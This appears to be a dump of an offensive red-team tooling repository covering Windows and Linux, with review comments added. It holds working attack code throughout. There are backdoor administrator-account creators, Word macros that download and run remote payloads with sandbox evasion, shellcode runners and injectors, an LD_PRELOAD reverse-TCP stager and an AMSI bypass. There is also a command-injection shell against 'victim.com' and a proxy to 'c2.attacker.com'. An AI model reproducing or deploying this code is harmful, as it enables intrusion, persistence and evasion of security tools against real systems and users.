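    # hop is in the clear unless that link is otherwise protected (VPN/SSH).
    location /api {
        proxy_pass http://c2.attacker.com:7001 ;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}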
40 |
--------------------------------------------------------------------------------
/misc/HtmlSmuggling.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
33 |
34 |
--------------------------------------------------------------------------------
/csharp/AddUserAdmin.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.DirectoryServices;
3 |
4 | namespace SharpAddUser
5 | {
/// <summary>
/// Creates a local user "ahacker" with a fixed password on this machine via
/// the WinNT ADSI provider and adds it to Guests and Administrators.
/// </summary>
/// <remarks>
/// Review notes:
///  - The credential is hard-coded and readable by anyone with the binary;
///    an account like this is a backdoor usable by third parties. Treat it as
///    engagement-scoped and remove it afterwards.
///  - Requires local administrator rights; otherwise the provider throws
///    (access denied) and the message is printed.
///  - DirectoryEntries.Find raises (not null) when a group does not exist, so
///    the null checks below are never the path taken — verify on the target OS.
///  - Account creation and group membership changes produce Security-log events
///    (typically 4720 / 4732), which is how this gets noticed.
///  - The DirectoryEntry objects are never disposed.
/// </remarks>
class Program
{
    static void Main(string[] args)
    {
        try
        {
            DirectoryEntry AD = new DirectoryEntry("WinNT://" +
            Environment.MachineName + ",computer");
            DirectoryEntry NewUser = AD.Children.Add("ahacker", "user");
            // Plaintext password literal in the binary.
            NewUser.Invoke("SetPassword", new object[] { "Passw0rd!" });
            NewUser.Invoke("Put", new object[] { "Description", "Test User from .NET" });
            NewUser.CommitChanges();
            DirectoryEntry grp;

            grp = AD.Children.Find("Guests", "group");
            if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }

            grp = AD.Children.Find("Administrators", "group");
            if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }

            Console.WriteLine("[>] Account Created Successfully");
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.Message);
            // NOTE(review): blocks forever when run without an attached console.
            Console.ReadLine();
        }
    }
}
35 | }
--------------------------------------------------------------------------------
/wsh/RunnerDecimalObfsNameCheck.vb:
--------------------------------------------------------------------------------
' Decodes one character: Beets is a 3-digit string (e.g. "131"); VBA coerces it
' to a number, subtracts the fixed offset 17 and returns Chr of the result.
' A non-numeric or empty string raises a type-mismatch run-time error.
Function Pears(Beets)
    Pears = Chr(Beets - 17)
End Function
4 |
' Returns the first 3-digit group of the encoded string.
Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function
8 |
' Drops the first 3 characters (one encoded group) from the string.
' Right with a negative length raises an error, so inputs shorter than 3 fail.
Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
12 |
' Decoder for the obfuscated strings in this macro: consumes the input three
' characters at a time, each group being (char code + 17) as decimal digits,
' and concatenates the decoded characters.
' Oatmilk is never declared (no Option Explicit); it starts as Empty, so the
' first concatenation yields a plain string. Because the loop body runs before
' the test, an empty input raises a run-time error instead of returning "".
Function Nuts(Milk)
    Do
        Oatmilk = Oatmilk + Pears(Strawberries(Milk))
        Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function
20 |
' Guard-railed PowerShell download cradle launched through WMI.
' All strings are stored with the +17 decimal encoding and recovered by Nuts
' at run time; applying that decoder to the literals below gives:
'   "131134127127118131063117128116"      -> runner.doc
'   "136122127126120126133132075"         -> winmgmts:
'   "104122127068067112097131128116118132132" -> Win32_Process
'   Apples -> powershell -exec bypass -nop -w hidden -c
'             iex((new-object system.net.webclient).downloadstring('http://192.168.49.83/run.txt'))
' Detection points: a Word process spawning powershell.exe via WMI
' (WmiPrvSE.exe is the parent, not WINWORD.EXE — that is the point of using
' WMI here), the hidden-window/bypass switches, and the plaintext HTTP fetch.
Function MyMacro()
    ' Guardrail: only run when the document still carries the name it was
    ' delivered with; automated detonation sandboxes usually rename samples.
    ' check for doc name of "runner.doc"
    If ActiveDocument.Name <> Nuts("131134127127118131063117128116") Then
        Exit Function
    End If

    Dim Apples As String
    Dim Water As String
    ' download cradle (encrypted with "caesar-cradle-encoder.ps1")
    Apples = "129128136118131132121118125125049062118137118116049115138129114132132049062127128129049062136049121122117117118127049062116049122118137057057127118136062128115123118116133049132138132133118126063127118133063136118115116125122118127133058063117128136127125128114117132133131122127120057056121133133129075064064066074067063066071073063069074063073068064131134127063133137133056058058"
    Water = Nuts(Apples)
    ' Win32_Process.Create(CommandLine, CurrentDirectory, StartupInfo, ProcessId).
    ' Tea, Coffee and Napkin are undeclared, i.e. Empty Variants, standing in for
    ' the remaining parameters; the new PID returned in Napkin is ignored.
    GetObject(Nuts("136122127126120126133132075")).Get(Nuts("104122127068067112097131128116118132132")).Create Water, Tea, Coffee, Napkin
End Function
34 |
' Legacy auto-macro entry point: runs MyMacro when the document is opened
' with macros enabled.
Sub AutoOpen()
    MyMacro
End Sub
38 |
--------------------------------------------------------------------------------
/c/exec_dll-apientry.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // source:https://github.com/Mr-Un1k0d3r/DLLsForHackers/blob/master/templates/exec.c
5 | // compile: "c:\Program Files\CodeBlocks\MinGW\bin\g++.exe" -Wall -DBUILD_DLL -O2 -c exec_dll-64.c -o output/exec_dll-64.o && "c:\Program Files\CodeBlocks\MinGW\bin\g++.exe" -shared -Wl,--dll output/exec_dll-64.o -o output/exec_dll-64.dll
6 |
7 | #ifdef BUILD_DLL
8 | #define DLL_EXPORT __declspec(dllexport)
9 | #else
10 | #define DLL_EXPORT __declspec(dllimport)
11 | #endif
12 |
// One-shot latch so the payload runs only on the first DllMain notification.
// Plain global with no synchronisation: two threads attaching at once could
// both see FALSE.
BOOL running = FALSE;
14 |
// Payload: creates local user "hacker" with a fixed password and adds it to
// the Administrators group by shelling out to net.exe via cmd.exe.
// Review notes:
//  - Credentials are hard-coded in the binary; the account is usable by anyone
//    who reads them. Requires the host process to be elevated.
//  - system() blocks until each command finishes and, in a GUI host, may flash
//    a console window. Called from DllMain it executes under the loader lock
//    (see DllMain below), which is officially unsupported and can deadlock.
//  - Exported so it can also be invoked directly (e.g. rundll32 <dll>,initCallback).
void DLL_EXPORT initCallback()
{
    if(!running) {
        system("cmd.exe /c net user hacker Password123! /add");
        system("cmd.exe /c net localgroup administrators hacker /add");
        running = TRUE;
    }

}
24 |
// DLL entry point. Every notification — process and thread attach/detach —
// funnels into initCallback(); the 'running' latch makes only the first act,
// so in practice DLL_PROCESS_ATTACH does the work and the other three cases
// are no-ops. Spawning processes from DllMain runs while the loader lock is
// held, which Microsoft documents as unsafe (possible deadlock or crash of
// the host); it is tolerated here because this is a proof of concept.
// Returning TRUE keeps the DLL loaded regardless of the payload's outcome.
extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            initCallback();
            break;

        case DLL_PROCESS_DETACH:
            initCallback();
            break;

        case DLL_THREAD_ATTACH:
            initCallback();
            break;

        case DLL_THREAD_DETACH:
            initCallback();
            break;
    }
    return TRUE;
}
--------------------------------------------------------------------------------
/cpp/DllScInject.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "pch.h"
3 | #include
4 | #include
5 | #include
6 |
7 | /* POC exec shellcode in unmanaged dll
8 | * source: https://github.com/theevilbit/injection
9 | * @thelikes
10 | */
11 |
// Classic remote shellcode injection: OpenProcess -> VirtualAllocEx (RWX) ->
// WriteProcessMemory -> CreateRemoteThread. The target PID and the shellcode
// are compile-time constants (PID 1108 via a pointless atoi of a literal; the
// 4 placeholder bytes are the start of a typical Windows stager).
// Review notes:
//  - No return value is checked: a NULL process handle or failed allocation
//    flows straight into WriteProcessMemory/CreateRemoteThread with garbage.
//  - PROCESS_ALL_ACCESS is more than needed (VM_OPERATION|VM_WRITE|CREATE_THREAD
//    suffice) and fails against protected processes.
//  - sizeof shellcode includes the terminating NUL; harmless (one extra byte).
//  - remoteThread handle is never closed; processHandle is.
//  - RWX allocation plus CreateRemoteThread into another process is the pattern
//    EDR injection heuristics commonly alert on.
extern "C" __declspec(dllexport) void sploit()
{
    unsigned char shellcode[] ="\xfc\xe8\x8f\x00";

    HANDLE processHandle;
    HANDLE remoteThread;
    PVOID remoteBuffer;

    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi("1108")));
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    CloseHandle(processHandle);
}
26 |
// DLL entry point: fires the injection once, on process attach. Doing
// OpenProcess/CreateRemoteThread from DllMain runs under the loader lock,
// which Microsoft documents as unsafe; acceptable for a PoC, fragile in a
// real host. Returning TRUE keeps the DLL loaded whatever sploit() did.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        sploit();
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
46 |
47 |
--------------------------------------------------------------------------------
/wsh/DownloadExec.vb:
--------------------------------------------------------------------------------
' Download-and-execute macro: fetches an MSBuild project file over plain HTTP,
' drops it in C:\Windows\Tasks (user-writable) and runs it with MSBuild.exe,
' which compiles and executes any inline task the XML contains.
' Review notes:
'  - MSXML2.XMLHTTP is WinINet-based, so it follows the user's proxy settings.
'  - Plaintext, unauthenticated fetch with no integrity check: anything on the
'    path can swap the project file and it runs as this user.
'  - The dropped file is left on disk; WINWORD.EXE spawning MSBuild.exe is the
'    obvious detection point.
'  - No Option Explicit: xhr, fso and stream are implicit Variants.
Sub MyMacro()
    Dim URL As String
    Dim filepath As String

    ' Doubled backslashes are literal in VBA; Windows tolerates them in paths.
    filepath = "c:\\windows\\tasks\\librun.xml"
    URL = "http://10.10.14.5:8080/librun.xml"

    Set xhr = CreateObject("MSXML2.XMLHTTP")
    With xhr
        .Open "GET", URL, False
        .Send
    End With

    If xhr.Status = 200 Then
        Set fso = CreateObject("Scripting.FileSystemObject")
        If fso.FileExists(filepath) Then fso.DeleteFile (filepath)

        ' ADODB.Stream in binary mode (Type = 1) writes the body byte-for-byte.
        Set stream = CreateObject("ADODB.Stream")
        stream.Open
        stream.Type = 1
        stream.Write (xhr.ResponseBody)
        stream.Position = 0
        stream.SaveToFile (filepath)
        stream.Close

        ' Shell "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe c:\\windows\\tasks\\librun.xml", vbHide

        ' waitOnReturn / windowStyle are declared but the literals 1 (normal
        ' window) and True (block until MSBuild exits) are passed instead, so the
        ' MSBuild window is visible and Word hangs for the payload's lifetime.
        ' The 32-bit Framework path is used; a 64-bit payload needs Framework64.
        Dim wsh As Object
        Set wsh = VBA.CreateObject("WScript.Shell")
        Dim waitOnReturn As Boolean: waitOnReturn = True
        Dim windowStyle As Integer: windowStyle = 1
        wsh.Run "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe c:\\windows\\tasks\\librun.xml", 1, True

        ' Alternative (kept for reference): Exec gives a process object that can be terminated.
        'Dim ws As Object
        'Set ws = CreateObject("WScript.Shell")
        'With ws.Exec("C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe c:\\windows\\tasks\\librun.xml")
        ' .StdIn.WriteBlankLines 1
        ' .Terminate
        'End With
    End If

End Sub
--------------------------------------------------------------------------------
/py/request_shell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests
3 | import sys
4 | import readline
5 |
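def RunCmd(cmd):
    """Send one shell command through the injectable ``ip`` parameter of
    ``ping.php`` and print the non-HTML lines of the response.

    ``cmd`` is percent-encoded before it is spliced into the query string so
    that shell metacharacters (``&``, ``#``, ``+``, spaces, ``;``) reach the
    server verbatim instead of being interpreted as query-string syntax by
    requests or the web server; the leading ``zzz;`` separator stays literal.

    Args:
        cmd: Command line to run on the target; sent as-is after encoding.

    Raises:
        requests.RequestException: on connection, proxy or TLS failures.
    """
    from urllib.parse import quote

    # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
    # set verify = False if your proxy certificate is self signed
    # remember to set proxies both for http and https
    #
    # example:
    #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    #verify = False
    proxies = {}
    verify = True

    # Headers
    headers = {
        'Host': 'victim.com',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
        'Connection': 'close',
    }

    # Data
    data = r''''''

    # Cookies
    cookies = {
    }

    # safe='' also encodes '/', so the whole command is one opaque value.
    buildurl = 'https://victim.com/ping.php?ip=zzz;{}'.format(quote(cmd, safe=''))

    # Prepare and send request
    req = requests.Request(
        method='GET',
        url=buildurl,
        headers=headers,
        data=data,
        cookies=cookies,
    )
    prepared_req = req.prepare()
    session = requests.Session()
    # verify was previously computed but never passed, so setting it to False
    # for an intercepting proxy had no effect.
    resp = session.send(prepared_req, proxies=proxies, verify=verify)
    #print(resp.text)
    # Crude de-HTMLing: drop lines that begin with a tag and keep the rest,
    # which is where command output lands in the page.
    for line in resp.text.splitlines():
        if not line.startswith("<"):
            print(line)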
51 |
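# Interactive loop: read a command, send it, repeat. "exit"/"quit", Ctrl-D
# and Ctrl-C all end the session cleanly instead of dumping a traceback.
while True:
    try:
        cmd = input('> ')
    except (EOFError, KeyboardInterrupt):
        print()
        sys.exit(0)
    if cmd in ("exit", "quit"):
        sys.exit(0)

    RunCmd(cmd)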
58 |
--------------------------------------------------------------------------------
/msbuild/MSBuild-RunspaceBypass-x64.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
9 |
10 |
11 |
12 | results = ps.Invoke();
38 | foreach (var result in results)
39 | {
40 | Console.WriteLine(result);
41 | }
42 | rs.Close();
43 | return true;
44 | }
45 | }
46 | ]]>
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/csharp/ClassSayMyName.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | /*
4 | * Class to extract remote payload URL from pe/lib filename.
5 | */
6 | namespace SayMyName
7 | {
/// <summary>
/// Derives the staging URL from the running binary's own file name, so one
/// build can be pointed at different listeners just by renaming it.
/// Expected shape: <c>&lt;anything&gt;_&lt;host&gt;_&lt;port&gt;[.ext]</c>,
/// e.g. <c>evil_10.10.14.5_8080.exe</c> → <c>http://10.10.14.5:8080</c>.
/// </summary>
public class ParseRemote
{
    private const string FallbackAddress = "0.0.0.0";
    private const string FallbackPort = "80";

    /// <summary>
    /// Splits <paramref name="binName"/> on '_' and builds a URL from the
    /// second and third pieces.
    /// </summary>
    /// <param name="binName">File name of the binary (not null).</param>
    /// <returns>
    /// The URL for a three-part name; for a name without '_' (a message is
    /// printed) or with any other number of parts, the fallback
    /// <c>http://0.0.0.0:80</c>. The port keeps only what precedes the first '.'.
    /// </returns>
    public static string GetUrl(string binName)
    {
        string host = FallbackAddress;
        string port = FallbackPort;

        if (!binName.Contains("_"))
        {
            Console.WriteLine("[!] Unknown remote");
            return BuildUrl(host, port);
        }

        string[] parts = binName.Split('_');
        if (parts.Length == 3)
        {
            host = parts[1];
            // Strip the extension ("8080.exe" → "8080").
            port = parts[2].Split('.')[0];
        }

        return BuildUrl(host, port);
    }

    /// <summary>
    /// Joins scheme, host and port. Any port containing "443" (443, 8443, but
    /// also e.g. 4431) selects https; everything else is http.
    /// </summary>
    /// <param name="addr">Host name or IP literal.</param>
    /// <param name="port">Port as text; not validated.</param>
    /// <returns><c>scheme://addr:port</c></returns>
    public static string BuildUrl(string addr, string port)
    {
        string scheme = port.Contains("443") ? "https" : "http";
        return string.Concat(scheme, "://", addr, ":", port);
    }
}
66 | }
67 |
--------------------------------------------------------------------------------
/wsh/InMemoryWin32CreateThread-SleepyCaesar.vb:
--------------------------------------------------------------------------------
' Win32 imports (PtrSafe/LongPtr => 64-bit Office). ThreadParameter is passed
' ByRef (the VBA default), so the literal 0 below becomes a pointer to a
' temporary rather than a NULL parameter — harmless because the shellcode
' ignores its argument.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

' VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

' RtlMoveMemory(dst, ByRef src, length) — src As Any lets a Long be passed by address.
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

' Sleep(milliseconds) — kernel32 Sleep, used for the timing check below.
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
8 |
' In-process shellcode runner with two evasions layered on top of the basic
' VirtualAlloc/RtlMoveMemory/CreateThread pattern:
'  1. a Sleep(2000) whose real elapsed time is measured — sandboxes that
'     fast-forward Sleep make the check fail and the macro exits silently;
'  2. the byte array is stored with +2 added to every byte (a Caesar shift)
'     and decoded in place, so the raw stager bytes never appear in the file.
Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    ' sleep
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long

    ' Timing guard: Now has one-second resolution, so 2000 ms measured as < 2 s
    ' only happens when Sleep was shortened (or the clock jumped).
    t1 = Now()
    Sleep (2000)
    t2 = Now()
    time = DateDiff("s", t1, t2)
    If time < 2 Then
        Exit Function
    End If

    ' Generator and encoder commands (bytes redacted as [...] in this listing):
    ' msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.83 LPORT=443 EXITFUNC=thread -f vbapplication
    ' C:\Tools\LikesEncoder\bin\Debug\LikesEncoder.exe Z:\meterp-https-x86.bin vba
    buf = Array(254, [...], 215)

    ' Undo the +2 shift. i is undeclared (no Option Explicit) and becomes a Variant.
    For i = 0 To UBound(buf)
        buf(i) = buf(i) - 2
    Next i

    ' NOTE(review): UBound(buf) is the last index, so this requests one byte
    ' fewer than the loop below writes; it only works because VirtualAlloc
    ' rounds the size up to a whole page.
    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)

    ' Byte-at-a-time copy: only the low byte of the 4-byte Long is copied.
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter

    ' Thread handle and id are discarded; the payload runs in the background.
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
45 |
' ThisDocument event handler. Both this and AutoOpen call MyMacro; if Word
' fires both for the same open, the shellcode is started twice.
Sub Document_Open()
    MyMacro
End Sub
49 |
' Legacy auto-macro entry point (runs when the document opens with macros
' enabled). See Document_Open for the double-trigger caveat.
Sub AutoOpen()
    MyMacro
End Sub
--------------------------------------------------------------------------------
/csharp/ScRunner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Runtime.InteropServices;
4 |
5 | namespace SharpSCRunner
6 | {
/// <summary>
/// Staged shellcode runner: downloads a base64 blob over HTTP, copies it into
/// RWX memory in this process and runs it on a new thread, then blocks until
/// that thread exits.
/// </summary>
class Program
{
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    [DllImport("kernel32.dll")]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    static void Main(string[] args)
    {
        // Plain HTTP to a hard-coded IP with no integrity check: anyone on the
        // path can substitute their own shellcode and it runs as this user.
        byte[] buf = GetShellcode("http://192.168.49.83/account");

        int size = buf.Length;

        // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        // NOTE(review): a failed allocation returns IntPtr.Zero, which is not
        // checked; Marshal.Copy would then write to address 0 and crash.
        // An RWX private allocation is the pattern memory scanners flag first.
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x3000, 0x40);

        Marshal.Copy(buf, 0, addr, size);

        // Thread handle is never closed and CreateThread's failure (IntPtr.Zero) is not checked.
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

        // 0xFFFFFFFF = INFINITE: keeps the process alive for the payload's lifetime.
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
    /// <summary>Downloads <paramref name="url"/> as text and base64-decodes it.</summary>
    /// <param name="url">URL serving the base64 payload.</param>
    /// <returns>Decoded bytes. Despite the local variable's name nothing is decompressed here.</returns>
    /// <exception cref="WebException">Network or HTTP error.</exception>
    /// <exception cref="FormatException">Body is not valid base64.</exception>
    public static byte[] GetShellcode(string url)
    {
        // NOTE(review): WebClient is IDisposable and is never disposed.
        WebClient client = new WebClient();
        // No user-agent is set; the default WebClient request has none.
        // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
        // Honour the system proxy and let it authenticate the current Windows
        // identity (DefaultCredentials) if it challenges.
        client.Proxy = WebRequest.GetSystemWebProxy();
        client.Proxy.Credentials = CredentialCache.DefaultCredentials;
        string compressedEncodedShellcode = client.DownloadString(url);
        return Convert.FromBase64String(compressedEncodedShellcode);
    }
}
43 | }
44 |
--------------------------------------------------------------------------------
/c/SharedPreLoad.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include // for mprotect
3 | #include
4 | #include
5 | #include
6 | #include
7 |
/*
 * x86-64 Linux shellcode (131 bytes). Read off the opcodes it does:
 *   mmap(NULL, 0x1000, PROT_READ|WRITE|EXEC, MAP_PRIVATE|MAP_ANONYMOUS)
 *   socket(AF_INET, SOCK_STREAM, 0)
 *   connect() to the embedded sockaddr_in 02 00 1f 90 c0 a8 31 53
 *       = AF_INET, port 0x1f90 (8080), 192.168.49.83
 *     retried up to 10 times with nanosleep(5 s) in between, exit(1) on giving up
 *   read() the next stage from the socket into the mmap'd page, then jmp into it
 * i.e. the shape of a staged reverse-TCP loader (Metasploit reverse_tcp stager).
 * It lives in .data (writable, not executable); geteuid() below mprotects it
 * before jumping.
 */
unsigned char buf[] =
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
"\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
"\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x1f\x90\xc0\xa8"
"\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
"\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
"\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
"\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
"\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
18 |
/*
 * LD_PRELOAD hook replacing libc's geteuid(). Every call forks: the child
 * makes the shellcode page executable and jumps to it, the parent returns the
 * real geteuid() so the host program carries on unaware.
 *
 * Review notes:
 *  - mprotect() covers only the one page that contains the start of buf. If
 *    the 131-byte array straddles a page boundary the tail stays non-executable
 *    and the child faults; round the length up to cover the whole array.
 *  - On mprotect failure the child returns -1 into the host instead of
 *    _exit()ing, so a second copy of the host keeps running.
 *  - Nothing reaps the child; it is reparented when the parent exits.
 *  - printf() inside a hooked libc call re-enters stdio and is a loud artefact.
 *  - uid_t is unsigned: -1 / -2 come back as 0xFFFFFFFF / 0xFFFFFFFE.
 *  - The trailing printf/return run only if the shellcode returns.
 */
uid_t geteuid(void)
{
    // set pointer type to old geteuid
    typeof(geteuid) *old_geteuid;

    // get memory addr of original (next object in the lookup chain = libc)
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");

    // fork & run
    if (fork() == 0)
    {
        // we're running inside our newly created child process, run shell
        intptr_t pagesize = sysconf(_SC_PAGESIZE);
        // Align buf's address down to its page and flip that page to RX.
        if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),pagesize, PROT_READ|PROT_EXEC))
        {
            perror("mprotect");
            return -1;
        }
        int (*ret)() = (int(*)())buf;
        ret();
    }
    else
    {
        // otherwise return expected value of geteuid to continue running as intended
        printf("HACK: returning from function...\n");
        return (*old_geteuid)();
    }

    printf("HACK: Returning from main...\n");
    return -2;
}
--------------------------------------------------------------------------------
/psh/AmsiBypass-AmsiOpenSession.ps1:
--------------------------------------------------------------------------------
# Resolves an exported function's address without declaring any P/Invoke of
# its own: it borrows GetModuleHandle/GetProcAddress from the already-loaded
# System.dll (Microsoft.Win32.UnsafeNativeMethods), which keeps Add-Type and
# the usual DllImport strings out of the script.
# Parameters: $moduleName - DLL already loaded in this process (e.g. amsi.dll);
#             $functionName - export to look up.
# Returns: the function address as IntPtr (0 if either lookup fails).
# Note: GetProcAddress has more than one overload there; $tmp[0] takes whichever
# GetMethods() returns first and assumes it is the (IntPtr, string) one.
function LookupFunc {

    Param ($moduleName, $functionName)

    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))
}
11 |
# Emits, in a throw-away in-memory assembly, a delegate type whose Invoke takes
# the parameter types in $func and returns $delType (void by default).
# Marshal.GetDelegateForFunctionPointer needs such a concrete delegate type to
# turn a raw function address into something PowerShell can call.
# Parameters: $func - [Type[]] of the native function's parameters;
#             $delType - return type.
# Returns: the generated delegate [Type].
function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )

    # Dynamic assembly/module/type deriving from MulticastDelegate.
    $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])

    # Runtime-managed ctor and Invoke: the CLR supplies the bodies for delegates.
    $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')

    $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')

    return $type.CreateType()
}
26 |
# AMSI bypass by in-memory patch: locate AmsiOpenSession in the amsi.dll this
# PowerShell process already loaded, make its first 3 bytes writable, overwrite
# them, then flip the page back.
[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
$oldProtectionBuffer = 0
# VirtualProtect(addr, size, newProtect, ref oldProtect) as a callable delegate
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32],[UInt32].MakeByRefType()) ([Bool])))
# 0x40 = PAGE_EXECUTE_READWRITE; the return value (failure => $false) is not checked.
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)

# 48 31 C0 = xor rax, rax — an x64 encoding; in a 32-bit PowerShell 0x48 is
# "dec eax" and this patch does not apply. The bypass relies on the function
# beginning with a 3-byte instruction whose flags a following conditional jump
# consumes: with ZF forced set, execution diverts into the error-return path
# and no buffer is scanned. Verify the prologue of the loaded amsi.dll build;
# a changed prologue turns this into a crash or a no-op.
$buf = [Byte[]] (0x48, 0x31, 0xC0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)
# restore — NOTE(review): 0x20 (PAGE_EXECUTE_READ) is hard-coded; the value
# saved in $oldProtectionBuffer is never used, so this assumes the page was RX.
$vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)
--------------------------------------------------------------------------------
/misc/ScRunner.aspx:
--------------------------------------------------------------------------------
1 | <%@ Page Language="C#" AutoEventWireup="true" %>
